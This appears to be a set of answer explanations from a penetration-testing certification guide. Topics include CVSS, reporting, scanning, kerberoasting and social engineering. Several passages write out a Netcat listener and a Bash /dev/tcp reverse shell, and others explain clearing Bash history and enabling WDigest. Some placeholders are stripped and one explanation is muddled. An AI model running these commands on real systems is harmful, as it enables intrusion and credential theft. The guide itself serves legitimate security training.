In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Use the flowchart in Figure 11.1 to answer this question. The code contains an fi statement, so it is written in Bash.

You will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, you are telling Netcat (nc) to not resolve names (- n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Bash and PowerShell allow the direct concatenation of strings and numeric values. Ruby and Python require the explicit conversion of numeric values to strings prior to concatenation.

While it may seem odd, exploiting information gathering exploits early can help provide useful information for other exploits. In addition, most information gathering exploits leave very little evidence and can provide information on service configurations and user accounts, making them a very useful tool in a situation like the scenario described

Code signing provides developers with a way to confirm the authenticity of their code to end users. Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals.

In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0–6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 10.0 and falls within the Critical category.

In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party

FTP is an unencrypted protocol, which means that Sami can simply capture FTP traffic the next time a user logs into the FTP server from the target system. A brute-force attack may succeed, but it’s more likely to be noticed. While an exploit may exist, the question does not mention it, and even if it does exist it will not necessarily provide credentials. Finally, downgrade attacks are not useful against FTP servers.

In this scenario, you are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if.. then ..else statements

The first step in a kerberoasting attack is to scan for Active Directory accounts with service principal names (SPNs) set. Next, she should request service tickets using the SPNs and then extract the service tickets. Once she has the tickets, she can conduct an offline bruteforce attack against them to recover the passwords used to encrypt the tickets.

The Common Attack Pattern Enumeration and Classification (CAPEC) list is a resource intended to help identify and document attacks and attack patterns. Users are allowed to search attacks by their mechanism or domain and then break down each attack by various attributes and prerequisites. CAPEC also suggests solutions and mitigations, which is useful in identifying controls when writing a penetration test report.

In this scenario, since it is port 23 that is open, this indicates the server you are on is a Telnet server. Telnet is a user command and an underlying TCP/IP protocol for accessing remote computers. Using Telnet, an administrator or another user can access someone else’s computer remotely. Telnet uses a command-line interface. Information transmitted between the Telnet server and client is sent unencrypted. This means that any authentication information may also be captured

The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.

A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed. Chapter 8 also covers physical security attacks, including techniques like key drops.

Assessments are valid only when they occur. Systems change due to patches, user changes, and configuration changes on a constant basis. Sami’s point-in-time validity statement is a key element in penetration testing engagement contracts.

The TCP connect scan is often used when an un-privileged account is the tester’s only option. Linux systems typically won’t allow an un-privileged account to have direct access to create packets, but they will allow accounts to send traffic. Steve probably won’t be able to use a TCP SYN scan, but a connect scan is likely to work. The other flags shown are for version testing (-sV) and output type selection (-oA), and -u doesn’t do anything at all.

A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: bash -i >& /dev/tcp//443 0>&1 Given the options, option A is the best option. Options B and C will not work because they are using the and not the , and option D is not correct because it is using the improper syntax

In this scenario, the only one that is not part of manufacturing is the real-time operating system (RTOS). RTOS is any operating system intended to serve real-time applications that process data as it comes in, typically without buffer delays. Industrial control system (ICS) is a term used to describe different types of control systems and associated instrumentation, which include the devices, systems, networks, and controls used to operate and/or automate industrial processes. Supervisory control and data acquisition (SCADA) systems are used to monitor and control production processes in a wide range of industries, including manufacturing, water treatment, mining, oil refining, transportation, and power distribution. A programmable logic controller (PLC) is an industrial solid-state computer that monitors inputs and outputs and makes logic-based decisions for automated processes or machines. A PLC is an industrial digital computer that has been adapted for the control of manufacturing processes, such as assembly lines, or robotic devices, or any activity that requires high reliability control and ease of programming and process fault diagnosis.

In this case, the .. operators are the telltale giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server’s root directory and access the /etc/passwd file on the server.

A false positive error occurs when the vulnerability scanner reports a vulnerability that does not actually exist.

The Windows task schedule is used for scheduled tasks. On Linux, cron jobs are set to start applications and other events on time. Other common means of creating persistent access to Linux systems include modifying system daemons, replacing services with trojaned versions, or even simply creating user accounts for later use.

A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a one-to-many search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as false acceptance rates (FARs) and false rejection rates (FRRs)

Internet of Things (IoT) devices are examples of nontraditional systems that may be fragile and highly susceptible to failure during vulnerability scans. Web servers and firewalls are typically designed for exposure to wider networks and are less likely to fail during a scan.

As you prepare for the exam, you should be able to identify the programming language used in code snippets. The Write-Host command is used to generate output in PowerShell.

While all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.

The legality of lockpicks varies from state to state in the U.S. While they are legal in most states, before he travels Dima should check the legality of lockpicks in his destination state and any states he will travel through.

Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for. Responder exploits the trust in a service response to tell the client that the responder host is a legitimate service provider, causing it to send its hashed credentials, which the owner of the Responder host can then use to authenticate to legitimate servers.

Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.

Because patient records are protected by the HIPPA law in the United States, this is an example of a compliance assessment. Compliance-based assessments are designed to test compliance with specific laws. Objective-based assessments are usually designed to assess the overall security of an organization. Gray box and white box assessments identify the level of knowledge the attacker has of the organization.

After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.

Fingerprinting Organizations with Collected Archives (FOCA) is a utility that you can use to gather metadata from an organization’s documents, such as Word, PowerPoint, OpenOffice, and Adobe Reader files. FOCA searches popular search engines, such as Google and Bing, for these files and extracts any metadata they may contain

Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.

A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would be best to run a full scan on the network.

Enabling WDigest on a modern Windows system that you have already compromised will cause it to cache plaintext passwords when each user logs in next.

Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network. This can be useful because IoT devices frequently employ weaker security mechanisms that a penetration tester can exploit.

In a virtualized data center, the virtual host hardware runs a special operating system known as a hypervisor that mediates access to the underlying hardware resources.

OS identification in Nmap is based on a variety of response attributes. In this case, Nmap’s best guess is that the remote host is running a Linux 2.6.9–2.6.33 kernel, but it cannot be more specific. It does not specify the distribution, patch level, or when the system was last patched.

Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used elicitation techniques to gather sensitive information from employees.

DOM-based XSS attacks hide the attack code within the Document Object Model. This code would not be visible to someone viewing the HTML source of the page. Other XSS attacks would leave visible traces in the browser.

The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target SYSTEM

Sami has used a watering hole attack, but he has also made what might be a critical mistake. Placing malware on a third- party site accessed by many in the local area (or beyond!) is likely beyond the scope of his engagement and is likely illegal. A better plan would have been to target a resource owned and operated by the company itself and accessed only by internal staff members.

The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a highlevel view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.

In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single InvokeCommand command, you can run commands on multiple computers

The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0-6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 3.6 and falls within the Low category

A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.

Unlike the other options listed here, Mimikatz pulls hashes from the lsass process. Since the question specifically notes “over the wire,” Mimikatz is the only tool that cannot be used for that.

In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i: Invokes an interactive Bash shell. > &/dev/tcp//: Pipes that shell to the tester. 0<&1 2>&1: Takes standard input and connects it to standard output. It does the same with standard error (2>).

A dictionary attack is a method of breaking into a password-protected computer or server by thoroughly entering every word in a dictionary as a password. Dictionary attacks work because many computer users use ordinary words as passwords. Dictionary attacks rely on a prebuilt dictionary of words. In many cases, penetration testers can add additional specific dictionary entries to a dictionary file for their penetration test based on knowledge; this can be beneficial in performing a dictionary attack. In this scenario, the penetration tester used social media to find additional keywords that may be beneficial in a dictionary attack.

You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a faceto-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.

During a penetration test, a tester may want to configure their scans to run as stealth scans. Stealth scans go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test

Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.

Sami has set up a bind shell, which connects a shell to a service port. A reverse shell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Sami has access to). The question does not provide enough information to determine if the shell might be a root shell, and blind shell is not a common penetration testing term.

Scope creep occurs when additional items are added to the scope of an assessment. Chris has gone beyond the scope of the initial assessment agreement. This can be expensive for clients or may cost Chris income if the additional time and effort is not accounted for in an addendum to his existing contract

An SNMP brute-force attack attacks an IP address with SNMP queries to determine the SNMP read-only and read-write community strings (or passwords). It does this by trying every possible password. The master information base (MIB) database that is created by SNMP contains important information on every device on the network. If a tester can crack the password on SNMP, they may be able to control each networked device. This would allow changes to configurations to taking devices offline.

In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

The Browser Exploitation Framework, or BeEF, is specifically designed for this type of attack. Dima can use it to easily deploy browser exploit tools to a malicious website and can then use various phishing and social engineering techniques to get ABC employees to visit the site.

A voice phishing attack (also called a vishing attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information

Dima knows that many system administrators move services from their common service ports to alternate ports and that 8080 and 8443 are likely alternate HTTP (TCP 80) and HTTPS (TCP 443) server ports, and she will use a web browser to connect to those ports to check them. She could use Telnet for this testing, but it requires significantly more manual work to gain the same result, making it a poor second choice unless she doesn’t have another option.

The only conclusion that Sami can draw from this information is that the server is offering unnecessary services because it is listening for SSH connections when it should not be supporting that service.

These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

The term de-escalation refers to the process of communication between the client and the tester to stop any exploitation being used during the penetration test because of the effects they may be having on the client’s network. In this scenario, the client was losing sales because of the website issues, so the testing needed to be stopped.

In this scenario, you would need to receive the bands and frequencies used by the client’s wireless devices in order to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, but knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.